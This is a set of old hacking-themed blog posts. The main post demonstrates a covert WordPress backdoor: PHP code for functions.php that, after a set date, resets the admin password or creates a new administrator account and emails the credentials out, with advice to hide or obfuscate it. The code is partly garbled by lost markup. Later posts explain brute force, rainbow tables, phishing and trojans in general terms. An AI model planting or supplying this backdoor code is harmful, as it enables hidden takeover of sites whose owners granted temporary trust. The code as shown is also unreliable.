Ashfame | Tech Blog » Hacking

Creating a backdoor in WordPress

Ashfame — Wed, 30 Mar 2011 21:35:29 +0000

First post in my WordPress Evil series, I will demonstrate how I can create a backdoor in WordPress. Idea of this post came from a question on WordPress Answers where someone asked – Is there a security risk giving someone temporary access to my blog’s code?

Example #1

Change the admin password after a certain date or time and inform us! Sounds good?

user_pass , $target_admin_id ) ) { // Have we already changed the password?

		add_action( 'shutdown', 'evilme_change_admin_password' );

		function evilme_change_admin_password() {

			global $target_admin_id;
			global $target_admin_new_password;
			global $target_admin_userinfo;

			wp_set_password( $target_admin_new_password, $target_admin_id );

			// now email me that my password of admin account has changed ready

			wp_mail( 'ashishsainiashfame@gmail.com', 'Admin password has been changed!', 'WP URL - '.get_bloginfo( 'wpurl' ).' | username: '.$target_admin_userinfo->user_login.' | password: '.$target_admin_new_password );
		}
	}
}

?>

At the very beginning, I checked if the current time is passed April 30, then execute all this code. Change it to the date when you want the backdoor to be created. The basic logic is to set the password of a user using wp_set_password() and keep a check on the password so as to avoid a database write and an alert email sent to you on every page load.

I have attached it to the shutdown hook so that it doesn’t disturb the page output exactly when it happens. Change the email address and the new password you want to set and try this on a demo WordPress install by pasting the code in functions.php file.

Example #2

Create a new admin user after a certain date or time and ping us when ready!

 'ashfame-evil',

				'user_pass' => 'evilme',

				'user_email' => 'ashishsainiashfame@hotmail.com',

				'role' => 'administrator'

			) );

			// now email me that my new admin account is ready

			wp_mail( 'ashishsainiashfame@gmail.com', 'New Admin account is ready', 'WP - '.get_bloginfo( 'wpurl' ).' | username: ashfame-evil | password: evilme' );
		}
	}

}

?>

Again I check for the date, and if the condition satisfies, I used wp_insert_user() to create a new administrator user. To make sure the code only do this once, I keep a check if the username I want to create exists or not. If its does, we have already created a new admin user of which you should have got an email. You can test this too by changing the email address and putting the code in your functions.php file.

Ideally you don’t keep this code easily visible, you can just hide it anywhere. Deep inside functions.php file, some custom plugin or even obfuscate the code.

This tutorial was solely for the purpose of fun & making people aware about the fact that it is not safe when you provide temporary access to your blog. If they did what just I demonstrated you would see everything fine, there will be nothing you can make note of but after the timer, it will create a backdoor. More logical implementation would be to create a administrator account at a certain amount of time, and then delete that user after 1 hour every day/week. The User ID would go up, and might create suspicion after quite some time, but possibilities are endless. Be smart, be aware, spread the word about it. Friends don’t let friends fall for others’ trap.

If you have any questions about the code here, feel free to shoot me a question in the comments. And don’t forget to share this post on Facebook & Tweet it!

Subscribe to feeds so as not to miss any of the evil posts!

Hacking – Brute Force & Rainbow Table explained

Ashfame — Mon, 03 Dec 2007 18:43:34 +0000

You must have seen in movies how a hacker cracks a password. He take out a small device from his pocket. Connect it to the locker or whatever he wants to crack and then lots of digits and alphabets are shuffled on the device’s screen and in a matter of minutes (and sometimes in seconds), the thing is unlocked. Pretty Impressive but it doesn’t happen that way. Basically a online system (by online system i means a system which requires you to log in to get access) can’t be hacked like that. Even a password stored in a offline file can’t be hacked so easily.

Lets take it as easy as it can get. You want to access a file which is password protected. You create a program that tries every possible combination of alphabets and numbers and then feed it to the file if its the right one. This procedure is repeated till the right combination is accepted by the file. This is what we call as a attack. And this very procedure of trying possible combinations is called Brute Force Attack.

Now executing such a program which is required to provide every possible combination requires a very good computing power. The time that it consumes in breaking a password depends on the length of password and the processor speed. Faster the processor, shorter the time it takes to crack the password. Think it would be easy if you have a dual core or quad core, Think again. On Desktop PCs it can take days to crack a password.

Memory Space Trade Off – It is a situation in which time taken for processing can be reduced at the cost of space and vice versa. To make it very clear, lets see this again with the help of an example. In the previous example, we can process the different combination before hand and then store them in a file. And when you need to break a password, combinations are retrieved from that file and this lessens the load on the processor. The only time consumption in this case is the retrieval of data from that file. This file is what is known as a Rainbow Table. It can break passwords in a few minutes and in even a few seconds depending how strong is the password. It can be obtained from the World Wide Web but beware of its size. Its size is in GBs.

Now even if a hacker has the best of hardware, he can’t hack that easily. Why? Ever entered a password wrong multiple times? It requires you to enter the image to confirm that you are a human and it is not a account and even if that fails (yes there are algorithms that can read the text behind the image), the user is forbidden to enter the password for a fixed amount of time. So, there is no way in hell that a hacker can hack by Brute force or even with the help of rainbow tables. But it surely gets the job done for offline files.

If I write more here in a single post, it would be difficult for many of us to analyze the information. So, more in coming posts. Use the comments section to ask questions or for leaving a response.

How a hacker can end you in trouble?

Ashfame — Sun, 25 Nov 2007 18:43:39 +0000

You must have seen that any attempt to login to any server is logged and if the hacker is unable to clean the log, he can be very easily traced by the administrator of the server. The reason that if hacker is unable to clean the log sounds silly but he can also be caught if at the time of his access, the administrator is also logged in. Now its not possible to use a cybercafe everytime he hacks something. lol. So how does he protect himself from getting caught? This is something that is teached before teaching how to hack Servers on the World Wide Web.

Make sure you read How a hacker can gain access to your PC?

Now, that a hacker has gain access to your PC. He uses your PC to hack others. So that even someone is able to trace him back he can get away with this easily and you are caught. Many times you don’t get caught because the hacker don’t want to ruin a already establish workstation. Hackers are pretty smart. But sometimes the administrators are also smart. lol. They can trace back from where the attack was carried out and there they got you. You won’t have the slightest hint of what has really happened unless FBI tells you so and your fault was just that you didn’t took proper measures for your security because of which you pose a security threat for others.

Its time to tighten your security. Isn’t it? What say?

How a hacker can gain access to your PC?

Ashfame — Mon, 19 Nov 2007 18:43:53 +0000

There are many ways in which a hacker can gain access to your PC. Infact it depends on the ability of hacker, in how many ways he/she can break into your PC. I am going to list how a hacker exploits already existing things to get his job done.Hacker needs to have the security feature turn off from your PC so that he can get into easily. The process now gets divided into two case.

Hacker makes a fool out of you and you yourself help the hacker.
Hacker exploits the level of security you have on your PC.

Now second option is the most difficult for a hacker (Remember, most difficult but not impossible). Its like you are fully armed at your end and he still manages to break into the security. The first option is very easy. A novice hacker to a Pro hacker, every class of hacker uses it and this is what I am going to explain in detail here.

Phishing Art : A fake page is designed looking exactly like a genuine one where users are asked to login & when they do it, details are sent to the hacker.

What you can do?

Always check the URL where you are logging in and if you find something suspicious, just close the window and open the page by typing the URL.

Trojans : Trojans are malicious program that disguised itself as something useful and attracts users. Users installing up the so called useful application end up with the malicious code installed on the system. Trojans can capture screenshots, log every key strokes, allow access to your hard disk and can use your PC for other hacking stuff.

What you can do?

Never use cracks, any suspicious tools & use security suite on PC.

Exploiting Vulnerability : This is what I am going to explain because this is the most important method on which every hacker works on. Every thing has flaws, nothing is perfect in this world. This is why beta versions & updates are released for fixing vulnerabilities left in the applications. Lets there is a application APP which has a flaw A which can be used to gain access to B which further allows you to control Z and Z allows you to take over the control of PC. Now this process of handling control can go from A to B, B to C can go on till Z. That means leading to a small flaw you can have access to a series of process/features which eventually allows to take over the PC.

What you can do?

Keep yourself updated with all patches of any software application you use.

Note : Never annoy a hacker. They can crack you and make you pay.

Tips for those who wants to learn hacking

Ashfame — Sat, 29 Sep 2007 07:19:43 +0000

Many people on net impressed by the word “hacking” might do a little search on google about learning hacking. No doubt, they are at the right place. I would have rather use words – they are on the right track but will they open up the right door and gain something or they will just end up becoming a victim them self.

First of all, there is a difference between hacking and cracking. In layman language all hacking, keygens, cracks, gaining unauthorized access is refered as hacking and the word hacking is marked with a tag which is illegal to do. But it is not the way it is supposed by a large audience. Hacking is defined as unauthorized use, or attempts to circumvent or bypass the security mechanisms of an information system or network. Click here for more definitions. Cracking is equivalent to hacking when it is done by bad intentions and not for security improvement and educational purposes.

A common man would try to hack accounts on yahoo, hotmail, gmail, orkut etc. For this a little search will do but in most of the case you will end up loosing your own details without a slightest hint. I remember searching for tools to hack yahoo, gmail etc and found out some tools which require you to login before they can serve any purpose or in the worst scenario just execute their tool which could do anything from getting someone’s password to installing a trojan on your system to spy on you. Trojan serve as a backdoor entry for the hacker to gain access your system and then use up the computing power you possess.

So if you really want to get through all this, I mean if you dare to, then just take care of the fact that the tool you are going to use to hack someone might be used by the hacker to hack you.